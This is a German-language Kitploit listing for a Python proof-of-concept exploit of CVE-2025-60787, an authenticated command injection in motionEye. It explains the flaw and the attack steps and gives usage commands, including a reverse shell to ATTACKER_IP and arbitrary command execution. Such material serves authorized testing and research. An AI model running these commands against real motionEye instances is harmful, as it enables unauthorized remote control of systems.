Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-60787-POC — Python-PoC für CVE-2025-60787, authentifizierte RCE (Remote Code Execution) durch OS-Befehlsinjektion in motionEye <= 0.43.1b4 über die nicht bereinigte image_file_name-Konfiguration | Kitploit
Tools/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

Python-PoC für CVE-2025-60787, authentifizierte RCE (Remote Code Execution) durch OS-Befehlsinjektion in motionEye <= 0.43.1b4 über die nicht bereinigte image_file_name-Konfiguration

Repository anzeigen
10vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-60787 - motionEye Authentifizierte RCE

Authentifizierte Remote-Codeausführung in motionEye <= 0.43.1b4 über einen nicht bereinigten motion-Konfigurationsparameter

Autor: d3vn0mi


Schwachstellenübersicht

FeldDetails
CVE-IDCVE-2025-60787
CVSS-Score7.2 (Hoch)
TypOS-Kommando-Injection (CWE-78)
BetroffenmotionEye <= 0.43.1b4
Behoben in0.43.1b5

motionEye akzeptiert beliebige Zeichenfolgen in Konfigurationsfeldern wie image_file_name und schreibt sie direkt in Motion-Konfigurationsdateien (/etc/motioneye/camera-*.conf). Wenn der Motion-Dienst neu startet, interpretiert er diese Felder als shell-expandierbare Zeichenfolgen, wodurch ein authentifizierter Angreifer beliebige Betriebssystembefehle einschleusen und ausführen kann.

Die Weboberfläche enthält eine clientseitige Validierung für diese Felder, die jedoch trivial umgangen werden kann, indem direkt manipulierte API-Anfragen gesendet werden.

Angriffsablauf

  1. Sich mit gültigen Administrator-Anmeldedaten bei motionEye authentifizieren
  2. Die Kamerakonfigurationsliste abrufen
  3. Eine modifizierte Konfiguration mit einem bösartigen image_file_name-Wert per POST übermitteln
  4. Motion verarbeitet den injizierten Befehl beim Erstellen von Schnappschüssen (über capture_mode: interval-snapshots)

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek
  • Gültige motionEye-Administrator-Anmeldedaten
  • Netzwerkzugriff auf die Ziel-motionEye-Instanz

Installation

git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

Verwendung

Der Exploit unterstützt zwei Modi: Reverse Shell und Befehlsausführung.

Reverse Shell

Starten Sie einen Listener auf Ihrem Rechner und führen Sie dann Folgendes aus:

python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

Befehlsausführung

python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

Optionen

FlagBeschreibung
--urlZiel-motionEye-URL inklusive Port
--usermotionEye-Benutzername
--passwordmotionEye-Passwort
-i / --hostListener-IP (Revshell-Modus)
--portListener-Port (Revshell-Modus)
-e / --execAuszuführender Befehl (Befehlsmodus)
--camera-idEine bestimmte Kamera-ID ansprechen
--sh/bin/sh anstelle von /bin/bash verwenden
--no-verifyTLS-Zertifikatsprüfung überspringen
--proxyDatenverkehr über einen Proxy leiten (z. B. http://127.0.0.1:8080)

Referenzen

  • GitHub Advisory - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Rapid7-Metasploit-Modul
  • motionEye-Projekt

Danksagungen

  • d3vn0mi – Exploit-Entwicklung und Tooling
  • gunzf0x – Ursprüngliche CVE-Entdeckung und -Forschung

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch dieser Software. Holen Sie vor dem Testen stets eine ordnungsgemäße Genehmigung ein.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Tool herunterladen